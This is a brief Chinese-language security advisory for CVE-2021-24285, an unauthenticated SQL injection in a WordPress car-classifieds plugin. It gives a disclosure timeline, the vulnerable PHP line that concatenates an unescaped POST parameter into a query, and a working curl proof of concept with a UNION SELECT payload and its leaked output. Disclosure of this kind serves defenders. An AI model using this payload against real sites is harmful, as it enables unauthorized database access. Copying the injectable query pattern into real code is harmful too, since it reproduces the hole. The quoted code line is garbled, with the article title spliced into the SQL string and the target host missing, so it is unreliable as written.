CVE-2021-24285 WordPress Sql注入

文章来源：Khan安全攻防实验室

CVE-2021-24285 

    插件名称：wp-plugin：cars-seller-auto-classifieds-script

    受影响的版本：2.1.0（如果有，则可能是较低版本）

    漏洞：注入

    所需的最低访问级别：未认证

披露时间

2021年4月19日：确定并向WPScan公开了问题

2021年4月19日：插件已关闭

2021年4月22日：分配了CVE

2021年4月26日：公开披露

技术细节

经过 身份验证和未经身份验证的用户都可以使用request_list_request AJAX调用，无法order_id在SQL语句中使用POST参数之前对其进行卫生检查，验证或转义，这会导致SQL注入问题。

漏洞代码：carseller_request_list.php＃L248

248:$result=$wpdb->get_results("SELECT * FROM$tablenameCVE-2021-24285 WordPress Sql注入 WHERE id=".$_POST['order_id']);

Poc：

curl'http:///wp-admin/admin-ajax.php' \  --data-raw 'action=request_list_request&order_id=-1662 UNION ALL SELECT NULL,NULL,current_user(),current_user(),current_user(),NULL,current_user(),current_user(),NULL-- -' \  --compressed \  --insecure

Request Details

Request IdCar TitleUntitledNamebob@localhost bob@localhostEmailbob@localhostPhonebob@localhostMessagebob@localhostReplyClose